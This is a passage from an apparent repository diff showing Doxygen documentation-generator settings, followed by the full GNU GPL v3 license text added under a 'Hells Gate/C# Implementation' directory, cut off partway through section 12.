COMPACT_RTF = NO
|
||||||
|
RTF_HYPERLINKS = NO
|
||||||
|
RTF_STYLESHEET_FILE =
|
||||||
|
RTF_EXTENSIONS_FILE =
|
||||||
|
RTF_SOURCE_CODE = NO
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the man page output
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
GENERATE_MAN = NO
|
||||||
|
MAN_OUTPUT = man
|
||||||
|
MAN_EXTENSION = .3
|
||||||
|
MAN_SUBDIR =
|
||||||
|
MAN_LINKS = NO
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the XML output
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
GENERATE_XML = NO
|
||||||
|
XML_OUTPUT = xml
|
||||||
|
XML_PROGRAMLISTING = YES
|
||||||
|
XML_NS_MEMB_FILE_SCOPE = NO
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the DOCBOOK output
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
GENERATE_DOCBOOK = NO
|
||||||
|
DOCBOOK_OUTPUT = docbook
|
||||||
|
DOCBOOK_PROGRAMLISTING = NO
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options for the AutoGen Definitions output
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
GENERATE_AUTOGEN_DEF = NO
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the Perl module output
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
GENERATE_PERLMOD = NO
|
||||||
|
PERLMOD_LATEX = NO
|
||||||
|
PERLMOD_PRETTY = YES
|
||||||
|
PERLMOD_MAKEVAR_PREFIX =
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the preprocessor
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
ENABLE_PREPROCESSING = YES
|
||||||
|
MACRO_EXPANSION = NO
|
||||||
|
EXPAND_ONLY_PREDEF = NO
|
||||||
|
SEARCH_INCLUDES = YES
|
||||||
|
INCLUDE_PATH =
|
||||||
|
INCLUDE_FILE_PATTERNS =
|
||||||
|
PREDEFINED =
|
||||||
|
EXPAND_AS_DEFINED =
|
||||||
|
SKIP_FUNCTION_MACROS = YES
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to external references
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
TAGFILES =
|
||||||
|
GENERATE_TAGFILE =
|
||||||
|
ALLEXTERNALS = NO
|
||||||
|
EXTERNAL_GROUPS = YES
|
||||||
|
EXTERNAL_PAGES = YES
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the dot tool
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
CLASS_DIAGRAMS = YES
|
||||||
|
DIA_PATH =
|
||||||
|
HIDE_UNDOC_RELATIONS = YES
|
||||||
|
HAVE_DOT = NO
|
||||||
|
DOT_NUM_THREADS = 1
|
||||||
|
DOT_FONTNAME = Helvetica
|
||||||
|
DOT_FONTSIZE = 10
|
||||||
|
DOT_FONTPATH =
|
||||||
|
CLASS_GRAPH = YES
|
||||||
|
COLLABORATION_GRAPH = YES
|
||||||
|
GROUP_GRAPHS = YES
|
||||||
|
UML_LOOK = NO
|
||||||
|
UML_LIMIT_NUM_FIELDS = 10
|
||||||
|
TEMPLATE_RELATIONS = NO
|
||||||
|
INCLUDE_GRAPH = YES
|
||||||
|
INCLUDED_BY_GRAPH = YES
|
||||||
|
CALL_GRAPH = NO
|
||||||
|
CALLER_GRAPH = NO
|
||||||
|
GRAPHICAL_HIERARCHY = YES
|
||||||
|
DIRECTORY_GRAPH = YES
|
||||||
|
DOT_IMAGE_FORMAT = png
|
||||||
|
INTERACTIVE_SVG = NO
|
||||||
|
DOT_PATH =
|
||||||
|
DOTFILE_DIRS =
|
||||||
|
MSCFILE_DIRS =
|
||||||
|
DIAFILE_DIRS =
|
||||||
|
PLANTUML_JAR_PATH =
|
||||||
|
PLANTUML_CFG_FILE =
|
||||||
|
PLANTUML_INCLUDE_PATH =
|
||||||
|
DOT_GRAPH_MAX_NODES = 50
|
||||||
|
MAX_DOT_GRAPH_DEPTH = 0
|
||||||
|
DOT_TRANSPARENT = NO
|
||||||
|
DOT_MULTI_TARGETS = YES
|
||||||
|
GENERATE_LEGEND = YES
|
||||||
|
DOT_CLEANUP = YES
|
674
Hells Gate/C# Implementation/LICENSE
Normal file
674
Hells Gate/C# Implementation/LICENSE
Normal file
@ -0,0 +1,674 @@
|
|||||||
|
GNU GENERAL PUBLIC LICENSE
|
||||||
|
Version 3, 29 June 2007
|
||||||
|
|
||||||
|
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
|
||||||
|
Everyone is permitted to copy and distribute verbatim copies
|
||||||
|
of this license document, but changing it is not allowed.
|
||||||
|
|
||||||
|
Preamble
|
||||||
|
|
||||||
|
The GNU General Public License is a free, copyleft license for
|
||||||
|
software and other kinds of works.
|
||||||
|
|
||||||
|
The licenses for most software and other practical works are designed
|
||||||
|
to take away your freedom to share and change the works. By contrast,
|
||||||
|
the GNU General Public License is intended to guarantee your freedom to
|
||||||
|
share and change all versions of a program--to make sure it remains free
|
||||||
|
software for all its users. We, the Free Software Foundation, use the
|
||||||
|
GNU General Public License for most of our software; it applies also to
|
||||||
|
any other work released this way by its authors. You can apply it to
|
||||||
|
your programs, too.
|
||||||
|
|
||||||
|
When we speak of free software, we are referring to freedom, not
|
||||||
|
price. Our General Public Licenses are designed to make sure that you
|
||||||
|
have the freedom to distribute copies of free software (and charge for
|
||||||
|
them if you wish), that you receive source code or can get it if you
|
||||||
|
want it, that you can change the software or use pieces of it in new
|
||||||
|
free programs, and that you know you can do these things.
|
||||||
|
|
||||||
|
To protect your rights, we need to prevent others from denying you
|
||||||
|
these rights or asking you to surrender the rights. Therefore, you have
|
||||||
|
certain responsibilities if you distribute copies of the software, or if
|
||||||
|
you modify it: responsibilities to respect the freedom of others.
|
||||||
|
|
||||||
|
For example, if you distribute copies of such a program, whether
|
||||||
|
gratis or for a fee, you must pass on to the recipients the same
|
||||||
|
freedoms that you received. You must make sure that they, too, receive
|
||||||
|
or can get the source code. And you must show them these terms so they
|
||||||
|
know their rights.
|
||||||
|
|
||||||
|
Developers that use the GNU GPL protect your rights with two steps:
|
||||||
|
(1) assert copyright on the software, and (2) offer you this License
|
||||||
|
giving you legal permission to copy, distribute and/or modify it.
|
||||||
|
|
||||||
|
For the developers' and authors' protection, the GPL clearly explains
|
||||||
|
that there is no warranty for this free software. For both users' and
|
||||||
|
authors' sake, the GPL requires that modified versions be marked as
|
||||||
|
changed, so that their problems will not be attributed erroneously to
|
||||||
|
authors of previous versions.
|
||||||
|
|
||||||
|
Some devices are designed to deny users access to install or run
|
||||||
|
modified versions of the software inside them, although the manufacturer
|
||||||
|
can do so. This is fundamentally incompatible with the aim of
|
||||||
|
protecting users' freedom to change the software. The systematic
|
||||||
|
pattern of such abuse occurs in the area of products for individuals to
|
||||||
|
use, which is precisely where it is most unacceptable. Therefore, we
|
||||||
|
have designed this version of the GPL to prohibit the practice for those
|
||||||
|
products. If such problems arise substantially in other domains, we
|
||||||
|
stand ready to extend this provision to those domains in future versions
|
||||||
|
of the GPL, as needed to protect the freedom of users.
|
||||||
|
|
||||||
|
Finally, every program is threatened constantly by software patents.
|
||||||
|
States should not allow patents to restrict development and use of
|
||||||
|
software on general-purpose computers, but in those that do, we wish to
|
||||||
|
avoid the special danger that patents applied to a free program could
|
||||||
|
make it effectively proprietary. To prevent this, the GPL assures that
|
||||||
|
patents cannot be used to render the program non-free.
|
||||||
|
|
||||||
|
The precise terms and conditions for copying, distribution and
|
||||||
|
modification follow.
|
||||||
|
|
||||||
|
TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
0. Definitions.
|
||||||
|
|
||||||
|
"This License" refers to version 3 of the GNU General Public License.
|
||||||
|
|
||||||
|
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||||
|
works, such as semiconductor masks.
|
||||||
|
|
||||||
|
"The Program" refers to any copyrightable work licensed under this
|
||||||
|
License. Each licensee is addressed as "you". "Licensees" and
|
||||||
|
"recipients" may be individuals or organizations.
|
||||||
|
|
||||||
|
To "modify" a work means to copy from or adapt all or part of the work
|
||||||
|
in a fashion requiring copyright permission, other than the making of an
|
||||||
|
exact copy. The resulting work is called a "modified version" of the
|
||||||
|
earlier work or a work "based on" the earlier work.
|
||||||
|
|
||||||
|
A "covered work" means either the unmodified Program or a work based
|
||||||
|
on the Program.
|
||||||
|
|
||||||
|
To "propagate" a work means to do anything with it that, without
|
||||||
|
permission, would make you directly or secondarily liable for
|
||||||
|
infringement under applicable copyright law, except executing it on a
|
||||||
|
computer or modifying a private copy. Propagation includes copying,
|
||||||
|
distribution (with or without modification), making available to the
|
||||||
|
public, and in some countries other activities as well.
|
||||||
|
|
||||||
|
To "convey" a work means any kind of propagation that enables other
|
||||||
|
parties to make or receive copies. Mere interaction with a user through
|
||||||
|
a computer network, with no transfer of a copy, is not conveying.
|
||||||
|
|
||||||
|
An interactive user interface displays "Appropriate Legal Notices"
|
||||||
|
to the extent that it includes a convenient and prominently visible
|
||||||
|
feature that (1) displays an appropriate copyright notice, and (2)
|
||||||
|
tells the user that there is no warranty for the work (except to the
|
||||||
|
extent that warranties are provided), that licensees may convey the
|
||||||
|
work under this License, and how to view a copy of this License. If
|
||||||
|
the interface presents a list of user commands or options, such as a
|
||||||
|
menu, a prominent item in the list meets this criterion.
|
||||||
|
|
||||||
|
1. Source Code.
|
||||||
|
|
||||||
|
The "source code" for a work means the preferred form of the work
|
||||||
|
for making modifications to it. "Object code" means any non-source
|
||||||
|
form of a work.
|
||||||
|
|
||||||
|
A "Standard Interface" means an interface that either is an official
|
||||||
|
standard defined by a recognized standards body, or, in the case of
|
||||||
|
interfaces specified for a particular programming language, one that
|
||||||
|
is widely used among developers working in that language.
|
||||||
|
|
||||||
|
The "System Libraries" of an executable work include anything, other
|
||||||
|
than the work as a whole, that (a) is included in the normal form of
|
||||||
|
packaging a Major Component, but which is not part of that Major
|
||||||
|
Component, and (b) serves only to enable use of the work with that
|
||||||
|
Major Component, or to implement a Standard Interface for which an
|
||||||
|
implementation is available to the public in source code form. A
|
||||||
|
"Major Component", in this context, means a major essential component
|
||||||
|
(kernel, window system, and so on) of the specific operating system
|
||||||
|
(if any) on which the executable work runs, or a compiler used to
|
||||||
|
produce the work, or an object code interpreter used to run it.
|
||||||
|
|
||||||
|
The "Corresponding Source" for a work in object code form means all
|
||||||
|
the source code needed to generate, install, and (for an executable
|
||||||
|
work) run the object code and to modify the work, including scripts to
|
||||||
|
control those activities. However, it does not include the work's
|
||||||
|
System Libraries, or general-purpose tools or generally available free
|
||||||
|
programs which are used unmodified in performing those activities but
|
||||||
|
which are not part of the work. For example, Corresponding Source
|
||||||
|
includes interface definition files associated with source files for
|
||||||
|
the work, and the source code for shared libraries and dynamically
|
||||||
|
linked subprograms that the work is specifically designed to require,
|
||||||
|
such as by intimate data communication or control flow between those
|
||||||
|
subprograms and other parts of the work.
|
||||||
|
|
||||||
|
The Corresponding Source need not include anything that users
|
||||||
|
can regenerate automatically from other parts of the Corresponding
|
||||||
|
Source.
|
||||||
|
|
||||||
|
The Corresponding Source for a work in source code form is that
|
||||||
|
same work.
|
||||||
|
|
||||||
|
2. Basic Permissions.
|
||||||
|
|
||||||
|
All rights granted under this License are granted for the term of
|
||||||
|
copyright on the Program, and are irrevocable provided the stated
|
||||||
|
conditions are met. This License explicitly affirms your unlimited
|
||||||
|
permission to run the unmodified Program. The output from running a
|
||||||
|
covered work is covered by this License only if the output, given its
|
||||||
|
content, constitutes a covered work. This License acknowledges your
|
||||||
|
rights of fair use or other equivalent, as provided by copyright law.
|
||||||
|
|
||||||
|
You may make, run and propagate covered works that you do not
|
||||||
|
convey, without conditions so long as your license otherwise remains
|
||||||
|
in force. You may convey covered works to others for the sole purpose
|
||||||
|
of having them make modifications exclusively for you, or provide you
|
||||||
|
with facilities for running those works, provided that you comply with
|
||||||
|
the terms of this License in conveying all material for which you do
|
||||||
|
not control copyright. Those thus making or running the covered works
|
||||||
|
for you must do so exclusively on your behalf, under your direction
|
||||||
|
and control, on terms that prohibit them from making any copies of
|
||||||
|
your copyrighted material outside their relationship with you.
|
||||||
|
|
||||||
|
Conveying under any other circumstances is permitted solely under
|
||||||
|
the conditions stated below. Sublicensing is not allowed; section 10
|
||||||
|
makes it unnecessary.
|
||||||
|
|
||||||
|
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||||
|
|
||||||
|
No covered work shall be deemed part of an effective technological
|
||||||
|
measure under any applicable law fulfilling obligations under article
|
||||||
|
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||||
|
similar laws prohibiting or restricting circumvention of such
|
||||||
|
measures.
|
||||||
|
|
||||||
|
When you convey a covered work, you waive any legal power to forbid
|
||||||
|
circumvention of technological measures to the extent such circumvention
|
||||||
|
is effected by exercising rights under this License with respect to
|
||||||
|
the covered work, and you disclaim any intention to limit operation or
|
||||||
|
modification of the work as a means of enforcing, against the work's
|
||||||
|
users, your or third parties' legal rights to forbid circumvention of
|
||||||
|
technological measures.
|
||||||
|
|
||||||
|
4. Conveying Verbatim Copies.
|
||||||
|
|
||||||
|
You may convey verbatim copies of the Program's source code as you
|
||||||
|
receive it, in any medium, provided that you conspicuously and
|
||||||
|
appropriately publish on each copy an appropriate copyright notice;
|
||||||
|
keep intact all notices stating that this License and any
|
||||||
|
non-permissive terms added in accord with section 7 apply to the code;
|
||||||
|
keep intact all notices of the absence of any warranty; and give all
|
||||||
|
recipients a copy of this License along with the Program.
|
||||||
|
|
||||||
|
You may charge any price or no price for each copy that you convey,
|
||||||
|
and you may offer support or warranty protection for a fee.
|
||||||
|
|
||||||
|
5. Conveying Modified Source Versions.
|
||||||
|
|
||||||
|
You may convey a work based on the Program, or the modifications to
|
||||||
|
produce it from the Program, in the form of source code under the
|
||||||
|
terms of section 4, provided that you also meet all of these conditions:
|
||||||
|
|
||||||
|
a) The work must carry prominent notices stating that you modified
|
||||||
|
it, and giving a relevant date.
|
||||||
|
|
||||||
|
b) The work must carry prominent notices stating that it is
|
||||||
|
released under this License and any conditions added under section
|
||||||
|
7. This requirement modifies the requirement in section 4 to
|
||||||
|
"keep intact all notices".
|
||||||
|
|
||||||
|
c) You must license the entire work, as a whole, under this
|
||||||
|
License to anyone who comes into possession of a copy. This
|
||||||
|
License will therefore apply, along with any applicable section 7
|
||||||
|
additional terms, to the whole of the work, and all its parts,
|
||||||
|
regardless of how they are packaged. This License gives no
|
||||||
|
permission to license the work in any other way, but it does not
|
||||||
|
invalidate such permission if you have separately received it.
|
||||||
|
|
||||||
|
d) If the work has interactive user interfaces, each must display
|
||||||
|
Appropriate Legal Notices; however, if the Program has interactive
|
||||||
|
interfaces that do not display Appropriate Legal Notices, your
|
||||||
|
work need not make them do so.
|
||||||
|
|
||||||
|
A compilation of a covered work with other separate and independent
|
||||||
|
works, which are not by their nature extensions of the covered work,
|
||||||
|
and which are not combined with it such as to form a larger program,
|
||||||
|
in or on a volume of a storage or distribution medium, is called an
|
||||||
|
"aggregate" if the compilation and its resulting copyright are not
|
||||||
|
used to limit the access or legal rights of the compilation's users
|
||||||
|
beyond what the individual works permit. Inclusion of a covered work
|
||||||
|
in an aggregate does not cause this License to apply to the other
|
||||||
|
parts of the aggregate.
|
||||||
|
|
||||||
|
6. Conveying Non-Source Forms.
|
||||||
|
|
||||||
|
You may convey a covered work in object code form under the terms
|
||||||
|
of sections 4 and 5, provided that you also convey the
|
||||||
|
machine-readable Corresponding Source under the terms of this License,
|
||||||
|
in one of these ways:
|
||||||
|
|
||||||
|
a) Convey the object code in, or embodied in, a physical product
|
||||||
|
(including a physical distribution medium), accompanied by the
|
||||||
|
Corresponding Source fixed on a durable physical medium
|
||||||
|
customarily used for software interchange.
|
||||||
|
|
||||||
|
b) Convey the object code in, or embodied in, a physical product
|
||||||
|
(including a physical distribution medium), accompanied by a
|
||||||
|
written offer, valid for at least three years and valid for as
|
||||||
|
long as you offer spare parts or customer support for that product
|
||||||
|
model, to give anyone who possesses the object code either (1) a
|
||||||
|
copy of the Corresponding Source for all the software in the
|
||||||
|
product that is covered by this License, on a durable physical
|
||||||
|
medium customarily used for software interchange, for a price no
|
||||||
|
more than your reasonable cost of physically performing this
|
||||||
|
conveying of source, or (2) access to copy the
|
||||||
|
Corresponding Source from a network server at no charge.
|
||||||
|
|
||||||
|
c) Convey individual copies of the object code with a copy of the
|
||||||
|
written offer to provide the Corresponding Source. This
|
||||||
|
alternative is allowed only occasionally and noncommercially, and
|
||||||
|
only if you received the object code with such an offer, in accord
|
||||||
|
with subsection 6b.
|
||||||
|
|
||||||
|
d) Convey the object code by offering access from a designated
|
||||||
|
place (gratis or for a charge), and offer equivalent access to the
|
||||||
|
Corresponding Source in the same way through the same place at no
|
||||||
|
further charge. You need not require recipients to copy the
|
||||||
|
Corresponding Source along with the object code. If the place to
|
||||||
|
copy the object code is a network server, the Corresponding Source
|
||||||
|
may be on a different server (operated by you or a third party)
|
||||||
|
that supports equivalent copying facilities, provided you maintain
|
||||||
|
clear directions next to the object code saying where to find the
|
||||||
|
Corresponding Source. Regardless of what server hosts the
|
||||||
|
Corresponding Source, you remain obligated to ensure that it is
|
||||||
|
available for as long as needed to satisfy these requirements.
|
||||||
|
|
||||||
|
e) Convey the object code using peer-to-peer transmission, provided
|
||||||
|
you inform other peers where the object code and Corresponding
|
||||||
|
Source of the work are being offered to the general public at no
|
||||||
|
charge under subsection 6d.
|
||||||
|
|
||||||
|
A separable portion of the object code, whose source code is excluded
|
||||||
|
from the Corresponding Source as a System Library, need not be
|
||||||
|
included in conveying the object code work.
|
||||||
|
|
||||||
|
A "User Product" is either (1) a "consumer product", which means any
|
||||||
|
tangible personal property which is normally used for personal, family,
|
||||||
|
or household purposes, or (2) anything designed or sold for incorporation
|
||||||
|
into a dwelling. In determining whether a product is a consumer product,
|
||||||
|
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||||
|
product received by a particular user, "normally used" refers to a
|
||||||
|
typical or common use of that class of product, regardless of the status
|
||||||
|
of the particular user or of the way in which the particular user
|
||||||
|
actually uses, or expects or is expected to use, the product. A product
|
||||||
|
is a consumer product regardless of whether the product has substantial
|
||||||
|
commercial, industrial or non-consumer uses, unless such uses represent
|
||||||
|
the only significant mode of use of the product.
|
||||||
|
|
||||||
|
"Installation Information" for a User Product means any methods,
|
||||||
|
procedures, authorization keys, or other information required to install
|
||||||
|
and execute modified versions of a covered work in that User Product from
|
||||||
|
a modified version of its Corresponding Source. The information must
|
||||||
|
suffice to ensure that the continued functioning of the modified object
|
||||||
|
code is in no case prevented or interfered with solely because
|
||||||
|
modification has been made.
|
||||||
|
|
||||||
|
If you convey an object code work under this section in, or with, or
|
||||||
|
specifically for use in, a User Product, and the conveying occurs as
|
||||||
|
part of a transaction in which the right of possession and use of the
|
||||||
|
User Product is transferred to the recipient in perpetuity or for a
|
||||||
|
fixed term (regardless of how the transaction is characterized), the
|
||||||
|
Corresponding Source conveyed under this section must be accompanied
|
||||||
|
by the Installation Information. But this requirement does not apply
|
||||||
|
if neither you nor any third party retains the ability to install
|
||||||
|
modified object code on the User Product (for example, the work has
|
||||||
|
been installed in ROM).
|
||||||
|
|
||||||
|
The requirement to provide Installation Information does not include a
|
||||||
|
requirement to continue to provide support service, warranty, or updates
|
||||||
|
for a work that has been modified or installed by the recipient, or for
|
||||||
|
the User Product in which it has been modified or installed. Access to a
|
||||||
|
network may be denied when the modification itself materially and
|
||||||
|
adversely affects the operation of the network or violates the rules and
|
||||||
|
protocols for communication across the network.
|
||||||
|
|
||||||
|
Corresponding Source conveyed, and Installation Information provided,
|
||||||
|
in accord with this section must be in a format that is publicly
|
||||||
|
documented (and with an implementation available to the public in
|
||||||
|
source code form), and must require no special password or key for
|
||||||
|
unpacking, reading or copying.
|
||||||
|
|
||||||
|
7. Additional Terms.
|
||||||
|
|
||||||
|
"Additional permissions" are terms that supplement the terms of this
|
||||||
|
License by making exceptions from one or more of its conditions.
|
||||||
|
Additional permissions that are applicable to the entire Program shall
|
||||||
|
be treated as though they were included in this License, to the extent
|
||||||
|
that they are valid under applicable law. If additional permissions
|
||||||
|
apply only to part of the Program, that part may be used separately
|
||||||
|
under those permissions, but the entire Program remains governed by
|
||||||
|
this License without regard to the additional permissions.
|
||||||
|
|
||||||
|
When you convey a copy of a covered work, you may at your option
|
||||||
|
remove any additional permissions from that copy, or from any part of
|
||||||
|
it. (Additional permissions may be written to require their own
|
||||||
|
removal in certain cases when you modify the work.) You may place
|
||||||
|
additional permissions on material, added by you to a covered work,
|
||||||
|
for which you have or can give appropriate copyright permission.
|
||||||
|
|
||||||
|
Notwithstanding any other provision of this License, for material you
|
||||||
|
add to a covered work, you may (if authorized by the copyright holders of
|
||||||
|
that material) supplement the terms of this License with terms:
|
||||||
|
|
||||||
|
a) Disclaiming warranty or limiting liability differently from the
|
||||||
|
terms of sections 15 and 16 of this License; or
|
||||||
|
|
||||||
|
b) Requiring preservation of specified reasonable legal notices or
|
||||||
|
author attributions in that material or in the Appropriate Legal
|
||||||
|
Notices displayed by works containing it; or
|
||||||
|
|
||||||
|
c) Prohibiting misrepresentation of the origin of that material, or
|
||||||
|
requiring that modified versions of such material be marked in
|
||||||
|
reasonable ways as different from the original version; or
|
||||||
|
|
||||||
|
d) Limiting the use for publicity purposes of names of licensors or
|
||||||
|
authors of the material; or
|
||||||
|
|
||||||
|
e) Declining to grant rights under trademark law for use of some
|
||||||
|
trade names, trademarks, or service marks; or
|
||||||
|
|
||||||
|
f) Requiring indemnification of licensors and authors of that
|
||||||
|
material by anyone who conveys the material (or modified versions of
|
||||||
|
it) with contractual assumptions of liability to the recipient, for
|
||||||
|
any liability that these contractual assumptions directly impose on
|
||||||
|
those licensors and authors.
|
||||||
|
|
||||||
|
All other non-permissive additional terms are considered "further
|
||||||
|
restrictions" within the meaning of section 10. If the Program as you
|
||||||
|
received it, or any part of it, contains a notice stating that it is
|
||||||
|
governed by this License along with a term that is a further
|
||||||
|
restriction, you may remove that term. If a license document contains
|
||||||
|
a further restriction but permits relicensing or conveying under this
|
||||||
|
License, you may add to a covered work material governed by the terms
|
||||||
|
of that license document, provided that the further restriction does
|
||||||
|
not survive such relicensing or conveying.
|
||||||
|
|
||||||
|
If you add terms to a covered work in accord with this section, you
|
||||||
|
must place, in the relevant source files, a statement of the
|
||||||
|
additional terms that apply to those files, or a notice indicating
|
||||||
|
where to find the applicable terms.
|
||||||
|
|
||||||
|
Additional terms, permissive or non-permissive, may be stated in the
|
||||||
|
form of a separately written license, or stated as exceptions;
|
||||||
|
the above requirements apply either way.
|
||||||
|
|
||||||
|
8. Termination.
|
||||||
|
|
||||||
|
You may not propagate or modify a covered work except as expressly
|
||||||
|
provided under this License. Any attempt otherwise to propagate or
|
||||||
|
modify it is void, and will automatically terminate your rights under
|
||||||
|
this License (including any patent licenses granted under the third
|
||||||
|
paragraph of section 11).
|
||||||
|
|
||||||
|
However, if you cease all violation of this License, then your
|
||||||
|
license from a particular copyright holder is reinstated (a)
|
||||||
|
provisionally, unless and until the copyright holder explicitly and
|
||||||
|
finally terminates your license, and (b) permanently, if the copyright
|
||||||
|
holder fails to notify you of the violation by some reasonable means
|
||||||
|
prior to 60 days after the cessation.
|
||||||
|
|
||||||
|
Moreover, your license from a particular copyright holder is
|
||||||
|
reinstated permanently if the copyright holder notifies you of the
|
||||||
|
violation by some reasonable means, this is the first time you have
|
||||||
|
received notice of violation of this License (for any work) from that
|
||||||
|
copyright holder, and you cure the violation prior to 30 days after
|
||||||
|
your receipt of the notice.
|
||||||
|
|
||||||
|
Termination of your rights under this section does not terminate the
|
||||||
|
licenses of parties who have received copies or rights from you under
|
||||||
|
this License. If your rights have been terminated and not permanently
|
||||||
|
reinstated, you do not qualify to receive new licenses for the same
|
||||||
|
material under section 10.
|
||||||
|
|
||||||
|
9. Acceptance Not Required for Having Copies.
|
||||||
|
|
||||||
|
You are not required to accept this License in order to receive or
|
||||||
|
run a copy of the Program. Ancillary propagation of a covered work
|
||||||
|
occurring solely as a consequence of using peer-to-peer transmission
|
||||||
|
to receive a copy likewise does not require acceptance. However,
|
||||||
|
nothing other than this License grants you permission to propagate or
|
||||||
|
modify any covered work. These actions infringe copyright if you do
|
||||||
|
not accept this License. Therefore, by modifying or propagating a
|
||||||
|
covered work, you indicate your acceptance of this License to do so.
|
||||||
|
|
||||||
|
10. Automatic Licensing of Downstream Recipients.
|
||||||
|
|
||||||
|
Each time you convey a covered work, the recipient automatically
|
||||||
|
receives a license from the original licensors, to run, modify and
|
||||||
|
propagate that work, subject to this License. You are not responsible
|
||||||
|
for enforcing compliance by third parties with this License.
|
||||||
|
|
||||||
|
An "entity transaction" is a transaction transferring control of an
|
||||||
|
organization, or substantially all assets of one, or subdividing an
|
||||||
|
organization, or merging organizations. If propagation of a covered
|
||||||
|
work results from an entity transaction, each party to that
|
||||||
|
transaction who receives a copy of the work also receives whatever
|
||||||
|
licenses to the work the party's predecessor in interest had or could
|
||||||
|
give under the previous paragraph, plus a right to possession of the
|
||||||
|
Corresponding Source of the work from the predecessor in interest, if
|
||||||
|
the predecessor has it or can get it with reasonable efforts.
|
||||||
|
|
||||||
|
You may not impose any further restrictions on the exercise of the
|
||||||
|
rights granted or affirmed under this License. For example, you may
|
||||||
|
not impose a license fee, royalty, or other charge for exercise of
|
||||||
|
rights granted under this License, and you may not initiate litigation
|
||||||
|
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||||
|
any patent claim is infringed by making, using, selling, offering for
|
||||||
|
sale, or importing the Program or any portion of it.
|
||||||
|
|
||||||
|
11. Patents.
|
||||||
|
|
||||||
|
A "contributor" is a copyright holder who authorizes use under this
|
||||||
|
License of the Program or a work on which the Program is based. The
|
||||||
|
work thus licensed is called the contributor's "contributor version".
|
||||||
|
|
||||||
|
A contributor's "essential patent claims" are all patent claims
|
||||||
|
owned or controlled by the contributor, whether already acquired or
|
||||||
|
hereafter acquired, that would be infringed by some manner, permitted
|
||||||
|
by this License, of making, using, or selling its contributor version,
|
||||||
|
but do not include claims that would be infringed only as a
|
||||||
|
consequence of further modification of the contributor version. For
|
||||||
|
purposes of this definition, "control" includes the right to grant
|
||||||
|
patent sublicenses in a manner consistent with the requirements of
|
||||||
|
this License.
|
||||||
|
|
||||||
|
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||||
|
patent license under the contributor's essential patent claims, to
|
||||||
|
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||||
|
propagate the contents of its contributor version.
|
||||||
|
|
||||||
|
In the following three paragraphs, a "patent license" is any express
|
||||||
|
agreement or commitment, however denominated, not to enforce a patent
|
||||||
|
(such as an express permission to practice a patent or covenant not to
|
||||||
|
sue for patent infringement). To "grant" such a patent license to a
|
||||||
|
party means to make such an agreement or commitment not to enforce a
|
||||||
|
patent against the party.
|
||||||
|
|
||||||
|
If you convey a covered work, knowingly relying on a patent license,
|
||||||
|
and the Corresponding Source of the work is not available for anyone
|
||||||
|
to copy, free of charge and under the terms of this License, through a
|
||||||
|
publicly available network server or other readily accessible means,
|
||||||
|
then you must either (1) cause the Corresponding Source to be so
|
||||||
|
available, or (2) arrange to deprive yourself of the benefit of the
|
||||||
|
patent license for this particular work, or (3) arrange, in a manner
|
||||||
|
consistent with the requirements of this License, to extend the patent
|
||||||
|
license to downstream recipients. "Knowingly relying" means you have
|
||||||
|
actual knowledge that, but for the patent license, your conveying the
|
||||||
|
covered work in a country, or your recipient's use of the covered work
|
||||||
|
in a country, would infringe one or more identifiable patents in that
|
||||||
|
country that you have reason to believe are valid.
|
||||||
|
|
||||||
|
If, pursuant to or in connection with a single transaction or
|
||||||
|
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||||
|
covered work, and grant a patent license to some of the parties
|
||||||
|
receiving the covered work authorizing them to use, propagate, modify
|
||||||
|
or convey a specific copy of the covered work, then the patent license
|
||||||
|
you grant is automatically extended to all recipients of the covered
|
||||||
|
work and works based on it.
|
||||||
|
|
||||||
|
A patent license is "discriminatory" if it does not include within
|
||||||
|
the scope of its coverage, prohibits the exercise of, or is
|
||||||
|
conditioned on the non-exercise of one or more of the rights that are
|
||||||
|
specifically granted under this License. You may not convey a covered
|
||||||
|
work if you are a party to an arrangement with a third party that is
|
||||||
|
in the business of distributing software, under which you make payment
|
||||||
|
to the third party based on the extent of your activity of conveying
|
||||||
|
the work, and under which the third party grants, to any of the
|
||||||
|
parties who would receive the covered work from you, a discriminatory
|
||||||
|
patent license (a) in connection with copies of the covered work
|
||||||
|
conveyed by you (or copies made from those copies), or (b) primarily
|
||||||
|
for and in connection with specific products or compilations that
|
||||||
|
contain the covered work, unless you entered into that arrangement,
|
||||||
|
or that patent license was granted, prior to 28 March 2007.
|
||||||
|
|
||||||
|
Nothing in this License shall be construed as excluding or limiting
|
||||||
|
any implied license or other defenses to infringement that may
|
||||||
|
otherwise be available to you under applicable patent law.
|
||||||
|
|
||||||
|
12. No Surrender of Others' Freedom.
|
||||||
|
|
||||||
|
If conditions are imposed on you (whether by court order, agreement or
|
||||||
|
otherwise) that contradict the conditions of this License, they do not
|
||||||
|
excuse you from the conditions of this License. If you cannot convey a
|
||||||
|
covered work so as to satisfy simultaneously your obligations under this
|
||||||
|
License and any other pertinent obligations, then as a consequence you may
|
||||||
|
not convey it at all. For example, if you agree to terms that obligate you
|
||||||
|
to collect a royalty for further conveying from those to whom you convey
|
||||||
|
the Program, the only way you could satisfy both those terms and this
|
||||||
|
